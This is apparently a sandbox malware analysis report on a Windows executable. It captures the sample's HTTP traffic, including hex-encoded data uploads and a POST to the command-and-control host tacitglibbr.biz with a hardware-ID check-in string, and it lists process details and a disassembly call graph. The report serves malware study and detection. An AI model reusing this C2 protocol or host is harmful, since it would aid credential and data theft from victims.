                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: dc db 42 f6 28 a2 27 e3 2a 61 09 76 df 39 72 15 24 9b f3 f3 1f 04 51 54 7c be 6a ad 0c f5 6d 35 c5 59 95 07 ee 56 ca 65 ee 25 0c ce d2 5d 91 5a 8b 86 57 02 84 cc c0 07 d4 ec 5e 70 16 6b b9 27 43 7f eb c2 3d 23 fd 0d 2f 59 cd 4f ab a9 94 47 59 56 90 5b 53 e0 e4 04 bb 18 c4 e0 ad 9d 23 ca 1c ec 47 c8 32 ca 3f a5 08 59 4d 89 ce bf 7a cd 6a 52 37 93 ee bb 98 92 d4 11 c5 0b 1d 4a b9 a7 dd 80 59 bd 11 a2 a6 63 5e 35 cb ea 79 6d b7 70 2e fd 9e 9f ab fa 66 91 90 c9 0c f6 2c c8 9d 37 69 c3 5d aa 8c af 37 45 70 1b 72 6c 88 c4 2c 34 fe 89 9e d9 14 39 27 23 1f 11 b0 ed 60 91 95 28 de f0 af e4 1d a3 b0 c6 14 4a d2 3c f1 a7 63 1c 9d 06 18 6b 03 be 41 80 b1 9e b2 76 83 bd c0 5f b0 5c d5 3d 65 51 3e 77 bd 7e bb 26 7c 53 3f 0e a7 38 bf 35 19 47 4c 1b aa 4f a2 6e 68 e8 17
                                                                                                                Data Ascii: B('*av9r$QT|jm5YVe%]ZW^pk'C=#/YOGYV[S#G2?YMzjR7JYc^5ymp.f,7i]7Eprl,49'#`(J<ckAv_\=eQ>w~&|S?85GLOnh
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: 65 6b c7 a4 25 bd 91 16 1f 8c 6c 52 92 4a 8f 6a 12 b7 af 9b a5 c9 a1 5e 75 96 5f 0f 05 91 d9 91 bd 0d b4 9a 97 4f eb 67 69 32 69 91 09 dd 3a 51 a4 c2 37 58 92 66 19 7f 3b 55 c9 94 54 5f 5b b3 3e 13 3d cd df 2d 39 48 35 02 ff ed 9c ec 95 01 8f 2a 41 10 d7 4d 68 23 29 af 20 9a d8 2f cf dd ea 88 ab 18 d0 cf 2a 44 90 d4 f9 f6 da f0 a1 10 2b 26 31 21 c2 83 8f 37 7d 00 a1 4e 71 5e 1d df b9 4e dd fb 92 96 e5 0d ca d4 69 6f 22 aa 90 fe 29 8a 69 30 80 85 59 bf db ea 6e f5 c1 5e 48 77 28 9e 56 8b df 4e 2f d1 26 91 b8 8c 06 31 3e 4f 8c 8d 48 43 4a 71 8b f3 33 5d b6 97 b0 a5 17 ba 4d 3e fc ee f6 3b 7a b4 10 91 56 3b 72 71 e1 2e dc 51 86 b6 60 92 11 6b 0f bf 22 cf c6 65 3d ba 95 ab 76 08 45 57 46 75 46 e1 b0 07 86 3f 5b f8 08 78 c6 23 db f5 6f 7a c3 31 00 fe 73 07 21
                                                                                                                Data Ascii: ek%lRJj^u_Ogi2i:Q7Xf;UT_[>=-9H5*AMh#) /*D+&1!7}Nq^Nio")i0Yn^Hw(VN/&1>OHCJq3]M>;zV;rq.Q`k"e=vEWFuF?[x#oz1s!
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: ea fb a2 4e c0 ec 10 3a 28 2b ca 34 1f 09 76 08 09 30 74 66 a9 af 4c 49 f9 ca 3b ee 7a aa 88 ff 3b c1 7e 5d 64 9e ec c1 75 47 81 e7 57 ea 42 22 f5 55 f1 76 f9 5f f5 37 0a 78 ec 73 db f9 30 95 8a 11 b7 2a 98 9d ab 71 87 2b b6 01 e0 dd ca 1f c0 6d 3a 4d 84 a2 60 d4 9d 34 24 d6 be 79 07 1e 61 a8 8f e4 5d ed fc 6d 11 a7 68 a2 34 5c 4a b6 1e 0a d7 d7 b2 fe 72 54 8c 7d 55 4c 97 54 6f 38 ca 4f c9 f1 ae e5 5b 0d 60 67 46 91 0a 46 8c 74 a1 38 fc 6d f3 80 e0 e1 e1 4f eb 91 0f c3 0b be f4 c7 40 68 7f 87 dc e6 50 34 3c f8 fc 47 92 90 69 15 36 7a b3 7d 41 6b 9f 97 07 fa fb 5c ce 6f 25 7d c7 22 69 f0 62 12 fb cb cb c4 fc ee 14 9b 7f e1 97 35 57 d5 b4 19 97 71 44 50 6f 66 ac 98 1e 4a 3f d5 ee bb 49 c4 51 cc 09 69 d1 23 2e 72 a1 14 08 81 10 e9 2e 15 19 51 9c e0 ed 5f 8f
                                                                                                                Data Ascii: N:(+4v0tfLI;z;~]duGWB"Uv_7xs0*q+m:M`4$ya]mh4\JrT}ULTo8O[`gFFt8mO@hP4<Gi6z}Ak\o%}"ib5WqDPofJ?IQi#.r.Q_
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: 9d 3f f6 f8 1b dd 1a 71 06 da 3a 7e 18 f2 ff 18 1b 11 d0 cd db 96 be 41 d5 0f da e0 7c a9 6c af fd 54 a9 65 84 da 5a a2 b6 8e 43 19 29 66 b4 a3 89 78 ca 40 d0 f0 78 44 e5 f0 e1 79 8b 85 9b 9f b7 2f f5 78 0c b6 ff 5c cd af 9e 4e 6f af c8 e3 ac 5d 65 e6 05 19 ca 93 e8 1a 86 a8 18 51 46 33 75 39 77 b3 b9 36 82 16 ce e4 84 26 6d 0e dd 4e 48 ab de e6 2c 0c 9e c7 41 0b 37 e3 e2 22 15 c0 cf 4d 1f 1c 72 78 a6 ce 75 9c ed cf 0c a7 15 86 77 7c 5c a4 63 0c 51 61 b5 a1 2c b6 59 8e 3a 70 aa bc fe 32 f4 2b 92 f6 76 17 63 e1 01 67 fd 2c 34 bf fd bb 25 7a fe 6e 1e 57 2e b2 b6 bf 40 4b b1 79 3d d2 44 aa fe ec e2 60 f5 fe 90 17 9d db 92 10 7d b0 d2 c0 10 08 d0 f7 6b 30 60 fc 6f 79 1d 50 81 3c 02 87 02 ca cd 3c 71 d2 ec b9 1f 1f d5 2b ca 2e 9c ed fa 2d 2b d2 5f 7c 8c a4 af
                                                                                                                Data Ascii: ?q:~A|lTeZC)fx@xDy/x\No]eQF3u9w6&mNH,A7"Mrxuw|\cQa,Y:p2+vcg,4%znW.@Ky=D`}k0`oyP<<q+.-+_|
                                                                                                                2024-12-17 08:45:05 UTC1050INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:45:05 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=fpc7ul0qav8jo330egj6fao2d3; expires=Sat, 12-Apr-2025 02:31:44 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7wJYzJnXzBcNi%2B%2FsS0vQHNWjNI2%2B%2BSvzgUWa%2BPEqjzBs7OmX32mXMKUow8PafjA0KhAY9EvJIHjxfCqrhPiQsNNatN9KJL6ZbN8fTMatxq%2B%2F6YaGEiP4vr0rHIlKBNibwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a27f09184319-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1620&rtt_var=639&sent=316&recv=585&lost=0&retrans=0&sent_bytes=2840&recv_bytes=554344&delivery_rate=1802469&cwnd=233&unsent_bytes=0&cid=962f0636cd91003a&ts=2463&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.449743104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:45:06 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 87
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:45:06 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 26 6a 3d 26 68 77 69 64 3d 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39
                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=yau6Na--7911731954&j=&hwid=88FE57294B3FC45EE430B6CE554835A9
                                                                                                                2024-12-17 08:45:07 UTC1032INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:45:07 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=kuimc5j7ejo99qc21q9k1srtd7; expires=Sat, 12-Apr-2025 02:31:46 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzcm0qllC2APo3mKC8CWNjcUW2uFuhEKK19YZZVpblZPsPT%2FtBE18%2Bc4k2qPuRyQkhhwF5egPxJ0mIMgEoo6x2jQGTzxtdGRFFvxl7YEEOC2IORfkeevmDHjlf8hEKxmAP0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a296bfa17287-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1858&min_rtt=1841&rtt_var=724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1476985&cwnd=191&unsent_bytes=0&cid=6894e557e5ef6776&ts=751&x=0"
                                                                                                                2024-12-17 08:45:07 UTC54INData Raw: 33 30 0d 0a 72 6c 78 35 77 72 32 62 6f 62 61 4f 78 45 6e 33 4b 63 51 4a 69 64 69 4f 41 6f 66 30 65 6d 58 57 75 52 35 42 61 6c 57 4a 53 72 44 31 41 51 3d 3d 0d 0a
                                                                                                                Data Ascii: 30rlx5wr2bobaOxEn3KcQJidiOAof0emXWuR5BalWJSrD1AQ==
                                                                                                                2024-12-17 08:45:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:03:44:39
                                                                                                                Start date:17/12/2024
                                                                                                                Path:C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\X2hna87N3Y.exe"
                                                                                                                Imagebase:0xd80000
                                                                                                                File size:800'256 bytes
                                                                                                                MD5 hash:443F4CF9F362A96BBD0845BA6D2859F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:03:44:40
                                                                                                                Start date:17/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:03:44:43
                                                                                                                Start date:17/12/2024
                                                                                                                Path:C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\X2hna87N3Y.exe"
                                                                                                                Imagebase:0xd80000
                                                                                                                File size:800'256 bytes
                                                                                                                MD5 hash:443F4CF9F362A96BBD0845BA6D2859F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6%
                                                                                                                  Dynamic/Decrypted Code Coverage:0.5%
                                                                                                                  Signature Coverage:2.5%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:26
                                                                                                                  execution_graph 20014 d8a2ea 20015 d8a2f6 __EH_prolog3_GS 20014->20015 20018 d8a35f 20015->20018 20019 d8a346 20015->20019 20022 d8a310 20015->20022 20016 d8b98e std::_Throw_Cpp_error 5 API calls 20017 d8a437 20016->20017 20033 d94621 20018->20033 20030 d89aa0 20019->20030 20022->20016 20023 d81840 std::_Throw_Cpp_error 29 API calls 20023->20022 20025 d8a37e 20026 d8a423 20025->20026 20027 d8a453 20025->20027 20028 d94621 45 API calls 20025->20028 20053 d89949 20025->20053 20026->20023 20027->20026 20057 d95c77 20027->20057 20028->20025 20031 d94621 45 API calls 20030->20031 20032 d89aab 20031->20032 20032->20022 20034 d9462d ___scrt_is_nonwritable_in_current_image 20033->20034 20035 d9464f 20034->20035 20036 d94637 20034->20036 20070 d8f144 EnterCriticalSection 20035->20070 20038 d934c5 __dosmaperr 14 API calls 20036->20038 20039 d9463c 20038->20039 20041 d93bb0 __strnicoll 29 API calls 20039->20041 20040 d9465a 20042 d9aab8 __fread_nolock 29 API calls 20040->20042 20045 d94672 20040->20045 20052 d94647 _Fputc 20041->20052 20042->20045 20043 d946da 20046 d934c5 __dosmaperr 14 API calls 20043->20046 20044 d94702 20071 d9473a 20044->20071 20045->20043 20045->20044 20048 d946df 20046->20048 20050 d93bb0 __strnicoll 29 API calls 20048->20050 20049 d94708 20081 d94732 20049->20081 20050->20052 20052->20025 20054 d89959 20053->20054 20055 d8997d 20053->20055 20054->20025 20253 d8abc5 20055->20253 20058 d95c83 ___scrt_is_nonwritable_in_current_image 20057->20058 20059 d95c8a 20058->20059 20060 d95c9f 20058->20060 20062 d934c5 __dosmaperr 14 API calls 20059->20062 20301 d8f144 EnterCriticalSection 20060->20301 20063 d95c8f 20062->20063 20065 d93bb0 __strnicoll 29 API calls 20063->20065 20064 d95ca9 20302 d95cea 20064->20302 20067 d95c9a 20065->20067 20067->20027 20070->20040 20072 d9475b 20071->20072 20073 d94746 20071->20073 20075 d9476a 20072->20075 20084 d9fa2e 20072->20084 20074 d934c5 __dosmaperr 14 API calls 20073->20074 20076 d9474b 20074->20076 20075->20049 20078 d93bb0 __strnicoll 29 API calls 20076->20078 20080 d94756 20078->20080 20080->20049 20252 d8f158 LeaveCriticalSection 20081->20252 20083 d94738 20083->20052 20085 d9fa39 20084->20085 20086 d9fa46 20085->20086 20089 d9fa5e 20085->20089 20087 d934c5 __dosmaperr 14 API calls 20086->20087 20088 d9fa4b 20087->20088 20090 d93bb0 __strnicoll 29 API calls 20088->20090 20091 d9fabd 20089->20091 20099 d94767 20089->20099 20105 da1a1f 20089->20105 20090->20099 20093 d9aab8 __fread_nolock 29 API calls 20091->20093 20094 d9fad6 20093->20094 20110 d9fe20 20094->20110 20097 d9aab8 __fread_nolock 29 API calls 20098 d9fb0f 20097->20098 20098->20099 20100 d9aab8 __fread_nolock 29 API calls 20098->20100 20099->20049 20101 d9fb1d 20100->20101 20101->20099 20102 d9aab8 __fread_nolock 29 API calls 20101->20102 20103 d9fb2b 20102->20103 20104 d9aab8 __fread_nolock 29 API calls 20103->20104 20104->20099 20106 d98700 __Getctype 14 API calls 20105->20106 20107 da1a3c 20106->20107 20108 d97347 ___free_lconv_mon 14 API calls 20107->20108 20109 da1a46 20108->20109 20109->20091 20111 d9fe2c ___scrt_is_nonwritable_in_current_image 20110->20111 20112 d9fe34 20111->20112 20116 d9fe4f 20111->20116 20113 d934d8 __dosmaperr 14 API calls 20112->20113 20114 d9fe39 20113->20114 20115 d934c5 __dosmaperr 14 API calls 20114->20115 20139 d9fade 20115->20139 20117 d9fe66 20116->20117 20118 d9fea1 20116->20118 20119 d934d8 __dosmaperr 14 API calls 20117->20119 20121 d9feaa 20118->20121 20122 d9febf 20118->20122 20120 d9fe6b 20119->20120 20123 d934c5 __dosmaperr 14 API calls 20120->20123 20124 d934d8 __dosmaperr 14 API calls 20121->20124 20140 d9ebd5 EnterCriticalSection 20122->20140 20130 d9fe73 20123->20130 20126 d9feaf 20124->20126 20131 d934c5 __dosmaperr 14 API calls 20126->20131 20127 d9fec5 20128 d9fef9 20127->20128 20129 d9fee4 20127->20129 20141 d9ff39 20128->20141 20132 d934c5 __dosmaperr 14 API calls 20129->20132 20133 d93bb0 __strnicoll 29 API calls 20130->20133 20131->20130 20135 d9fee9 20132->20135 20133->20139 20137 d934d8 __dosmaperr 14 API calls 20135->20137 20136 d9fef4 20204 d9ff31 20136->20204 20137->20136 20139->20097 20139->20099 20140->20127 20142 d9ff4b 20141->20142 20143 d9ff63 20141->20143 20144 d934d8 __dosmaperr 14 API calls 20142->20144 20145 da02a5 20143->20145 20151 d9ffa6 20143->20151 20146 d9ff50 20144->20146 20147 d934d8 __dosmaperr 14 API calls 20145->20147 20148 d934c5 __dosmaperr 14 API calls 20146->20148 20149 da02aa 20147->20149 20153 d9ff58 20148->20153 20150 d934c5 __dosmaperr 14 API calls 20149->20150 20154 d9ffbe 20150->20154 20152 d9ffb1 20151->20152 20151->20153 20158 d9ffe1 20151->20158 20155 d934d8 __dosmaperr 14 API calls 20152->20155 20153->20136 20159 d93bb0 __strnicoll 29 API calls 20154->20159 20156 d9ffb6 20155->20156 20157 d934c5 __dosmaperr 14 API calls 20156->20157 20157->20154 20160 d9fffa 20158->20160 20161 da0007 20158->20161 20162 da0035 20158->20162 20159->20153 20160->20161 20166 da0023 20160->20166 20163 d934d8 __dosmaperr 14 API calls 20161->20163 20164 d97381 __fread_nolock 15 API calls 20162->20164 20165 da000c 20163->20165 20167 da0046 20164->20167 20168 d934c5 __dosmaperr 14 API calls 20165->20168 20211 da26b4 20166->20211 20170 d97347 ___free_lconv_mon 14 API calls 20167->20170 20171 da0013 20168->20171 20174 da004f 20170->20174 20175 d93bb0 __strnicoll 29 API calls 20171->20175 20172 da0181 20173 da01f5 20172->20173 20176 da019a GetConsoleMode 20172->20176 20178 da01f9 ReadFile 20173->20178 20177 d97347 ___free_lconv_mon 14 API calls 20174->20177 20203 da001e __fread_nolock 20175->20203 20176->20173 20179 da01ab 20176->20179 20180 da0056 20177->20180 20181 da026d GetLastError 20178->20181 20182 da0211 20178->20182 20179->20178 20184 da01b1 ReadConsoleW 20179->20184 20185 da007b 20180->20185 20186 da0060 20180->20186 20187 da027a 20181->20187 20188 da01d1 20181->20188 20182->20181 20183 da01ea 20182->20183 20198 da024d 20183->20198 20199 da0236 20183->20199 20183->20203 20184->20183 20191 da01cb GetLastError 20184->20191 20207 d9dccf 20185->20207 20193 d934c5 __dosmaperr 14 API calls 20186->20193 20189 d934c5 __dosmaperr 14 API calls 20187->20189 20195 d934eb __dosmaperr 14 API calls 20188->20195 20188->20203 20194 da027f 20189->20194 20191->20188 20192 d97347 ___free_lconv_mon 14 API calls 20192->20153 20196 da0065 20193->20196 20197 d934d8 __dosmaperr 14 API calls 20194->20197 20195->20203 20200 d934d8 __dosmaperr 14 API calls 20196->20200 20197->20203 20198->20203 20233 da05e6 20198->20233 20220 da0342 20199->20220 20200->20203 20203->20192 20251 d9ebf8 LeaveCriticalSection 20204->20251 20206 d9ff37 20206->20139 20208 d9dce3 _Fputc 20207->20208 20239 d9de70 20208->20239 20210 d9dcf8 _Fputc 20210->20166 20212 da26ce 20211->20212 20213 da26c1 20211->20213 20216 da26da 20212->20216 20217 d934c5 __dosmaperr 14 API calls 20212->20217 20214 d934c5 __dosmaperr 14 API calls 20213->20214 20215 da26c6 20214->20215 20215->20172 20216->20172 20218 da26fb 20217->20218 20219 d93bb0 __strnicoll 29 API calls 20218->20219 20219->20215 20245 da0499 20220->20245 20222 d973cf __fread_nolock MultiByteToWideChar 20224 da0456 20222->20224 20227 da045f GetLastError 20224->20227 20230 da038a 20224->20230 20225 da03e4 20231 da039e 20225->20231 20232 d9dccf __fread_nolock 31 API calls 20225->20232 20226 da03d4 20228 d934c5 __dosmaperr 14 API calls 20226->20228 20229 d934eb __dosmaperr 14 API calls 20227->20229 20228->20230 20229->20230 20230->20203 20231->20222 20232->20231 20234 da0620 20233->20234 20235 da06b6 ReadFile 20234->20235 20236 da06b1 20234->20236 20235->20236 20237 da06d3 20235->20237 20236->20203 20237->20236 20238 d9dccf __fread_nolock 31 API calls 20237->20238 20238->20236 20240 d9e98c __fread_nolock 29 API calls 20239->20240 20241 d9de82 20240->20241 20242 d9de9e SetFilePointerEx 20241->20242 20244 d9de8a __fread_nolock 20241->20244 20243 d9deb6 GetLastError 20242->20243 20242->20244 20243->20244 20244->20210 20246 da04cd 20245->20246 20247 da053e ReadFile 20246->20247 20248 da0359 20246->20248 20247->20248 20249 da0557 20247->20249 20248->20225 20248->20226 20248->20230 20248->20231 20249->20248 20250 d9dccf __fread_nolock 31 API calls 20249->20250 20250->20248 20251->20206 20252->20083 20254 d8ac79 20253->20254 20255 d8abe9 20253->20255 20257 d81e30 std::_Throw_Cpp_error 30 API calls 20254->20257 20256 d81eb0 std::_Throw_Cpp_error 5 API calls 20255->20256 20258 d8abfb 20256->20258 20259 d8ac7e 20257->20259 20264 d820c0 20258->20264 20261 d8ac06 _Yarn 20262 d8ac47 _Yarn 20261->20262 20271 d81a10 20261->20271 20262->20054 20265 d820df 20264->20265 20266 d820d3 20264->20266 20267 d820ec 20265->20267 20268 d820ff 20265->20268 20266->20261 20277 d82140 20267->20277 20285 d821b0 20268->20285 20272 d81a33 20271->20272 20273 d81a45 error_info_injector 20271->20273 20297 d81a70 20272->20297 20275 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20273->20275 20276 d81a61 20275->20276 20276->20262 20278 d8215e 20277->20278 20279 d82163 20277->20279 20288 d821d0 20278->20288 20281 d821b0 std::_Throw_Cpp_error 3 API calls 20279->20281 20282 d8216e 20281->20282 20283 d8217b 20282->20283 20292 d93bc0 20282->20292 20283->20266 20286 d88e36 codecvt 3 API calls 20285->20286 20287 d821c2 20286->20287 20287->20266 20289 d821e8 codecvt 20288->20289 20290 d8c47a CallUnexpected RaiseException 20289->20290 20291 d821fd 20290->20291 20293 d93dff __strnicoll 29 API calls 20292->20293 20294 d93bcf 20293->20294 20295 d93bdd __Getctype 11 API calls 20294->20295 20296 d93bdc 20295->20296 20298 d81ab3 20297->20298 20299 d81abd 20298->20299 20300 d93bc0 std::_Throw_Cpp_error 29 API calls 20298->20300 20299->20273 20300->20299 20301->20064 20303 d95d02 20302->20303 20310 d95d72 20302->20310 20304 d9aab8 __fread_nolock 29 API calls 20303->20304 20307 d95d08 20304->20307 20305 da1a1f __fread_nolock 14 API calls 20309 d95cb7 20305->20309 20306 d95d5a 20308 d934c5 __dosmaperr 14 API calls 20306->20308 20307->20306 20307->20310 20311 d95d5f 20308->20311 20313 d95ce2 20309->20313 20310->20305 20310->20309 20312 d93bb0 __strnicoll 29 API calls 20311->20312 20312->20309 20316 d8f158 LeaveCriticalSection 20313->20316 20315 d95ce8 20315->20067 20316->20315 22535 d88deb 22540 d89bea 22535->22540 22537 d88dfe 22538 d88f6d std::ios_base::_Init 32 API calls 22537->22538 22539 d88e08 22538->22539 22541 d89bf6 __EH_prolog3 22540->22541 22544 d89b1f 22541->22544 22543 d89c48 codecvt 22543->22537 22553 d899d8 22544->22553 22546 d89b2a 22561 d83e50 22546->22561 22549 d89b56 22551 d89b62 22549->22551 22579 d8b99d 22549->22579 22551->22543 22554 d899e4 __EH_prolog3 22553->22554 22555 d82ae0 std::ios_base::_Init 39 API calls 22554->22555 22556 d89a15 22555->22556 22557 d88e36 codecvt 3 API calls 22556->22557 22558 d89a1c 22557->22558 22559 d89a2d codecvt 22558->22559 22584 d894bf 22558->22584 22559->22546 22562 d83e74 22561->22562 22563 d83ec0 49 API calls 22562->22563 22564 d83e82 std::ios_base::_Ios_base_dtor 22563->22564 22565 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22564->22565 22566 d83eb1 22565->22566 22566->22549 22567 d82ae0 22566->22567 22568 d82bcc 22567->22568 22569 d82b24 22567->22569 22570 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22568->22570 22572 d8c47a CallUnexpected RaiseException 22569->22572 22573 d82b44 22569->22573 22571 d82bd6 22570->22571 22571->22549 22572->22573 22622 d82be0 22573->22622 22575 d82b9f 22625 d82c20 22575->22625 22578 d8c47a CallUnexpected RaiseException 22578->22568 22580 d891bd std::_Lockit::_Lockit 7 API calls 22579->22580 22581 d8b9ab 22580->22581 22582 d891ee std::_Lockit::~_Lockit 2 API calls 22581->22582 22583 d8b9e6 22582->22583 22583->22551 22585 d894cb __EH_prolog3 22584->22585 22586 d891bd std::_Lockit::_Lockit 7 API calls 22585->22586 22587 d894d6 22586->22587 22595 d89507 22587->22595 22596 d893c8 22587->22596 22589 d891ee std::_Lockit::~_Lockit 2 API calls 22591 d89544 codecvt 22589->22591 22590 d894e9 22602 d89552 22590->22602 22591->22559 22594 d89349 _Yarn 14 API calls 22594->22595 22595->22589 22597 d88e36 codecvt 3 API calls 22596->22597 22598 d893d3 22597->22598 22599 d893e7 22598->22599 22606 d8945c 22598->22606 22599->22590 22603 d8955e 22602->22603 22604 d894f1 22602->22604 22609 d8b844 22603->22609 22604->22594 22607 d89349 _Yarn 14 API calls 22606->22607 22608 d893e5 22607->22608 22608->22590 22610 d9411a 22609->22610 22611 d8b854 EncodePointer 22609->22611 22612 d997c5 std::locale::_Setgloballocale 2 API calls 22610->22612 22611->22604 22613 d9411f 22612->22613 22614 d997ec std::locale::_Setgloballocale 39 API calls 22613->22614 22617 d9412a 22613->22617 22614->22617 22615 d94134 IsProcessorFeaturePresent 22618 d94140 22615->22618 22616 d94153 22619 d91334 std::locale::_Setgloballocale 21 API calls 22616->22619 22617->22615 22617->22616 22620 d93c11 std::locale::_Setgloballocale 8 API calls 22618->22620 22621 d9415d 22619->22621 22620->22616 22630 d82dc0 22622->22630 22624 d82bf7 std::ios_base::_Init 22624->22575 22648 d831e0 22625->22648 22628 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22629 d82bb4 22628->22629 22629->22578 22633 d82e00 22630->22633 22634 d82dc8 22633->22634 22635 d82e27 22633->22635 22634->22624 22641 d88eb8 AcquireSRWLockExclusive 22635->22641 22637 d82e35 22637->22634 22638 d88f6d std::ios_base::_Init 32 API calls 22637->22638 22639 d82e50 22638->22639 22646 d88f07 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 22639->22646 22645 d88ecc 22641->22645 22642 d88ed1 ReleaseSRWLockExclusive 22642->22637 22645->22642 22647 d88f58 SleepConditionVariableSRW 22645->22647 22646->22634 22647->22645 22649 d81040 std::_Throw_Cpp_error 30 API calls 22648->22649 22650 d83218 22649->22650 22651 d832c0 std::_Throw_Cpp_error 30 API calls 22650->22651 22652 d83243 22651->22652 22653 d810b0 std::_Throw_Cpp_error 29 API calls 22652->22653 22654 d8324e 22653->22654 22655 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22654->22655 22656 d82c67 22655->22656 22656->22628 20398 d8949d 20401 d8939d 20398->20401 20400 d894a8 error_info_injector 20406 d893eb 20401->20406 20404 d893bb 20404->20400 20405 d94c7a ___vcrt_freefls@4 14 API calls 20405->20404 20413 d891bd 20406->20413 20409 d94c7a ___vcrt_freefls@4 14 API calls 20410 d8944f 20409->20410 20419 d891ee 20410->20419 20412 d893ac 20412->20404 20412->20405 20414 d891cc 20413->20414 20415 d891d3 20413->20415 20426 d93ed6 20414->20426 20417 d891d1 20415->20417 20431 d8b828 EnterCriticalSection 20415->20431 20417->20409 20420 d891f8 20419->20420 20421 d93ee4 20419->20421 20422 d8920b 20420->20422 20474 d8b836 LeaveCriticalSection 20420->20474 20475 d93ebf LeaveCriticalSection 20421->20475 20422->20412 20425 d93eeb 20425->20412 20432 d9832b 20426->20432 20431->20417 20433 d984b2 std::_Locinfo::_Locinfo_dtor 5 API calls 20432->20433 20434 d98330 20433->20434 20453 d984cc 20434->20453 20437 d984e6 std::_Locinfo::_Locinfo_dtor 5 API calls 20438 d9833a 20437->20438 20456 d98500 20438->20456 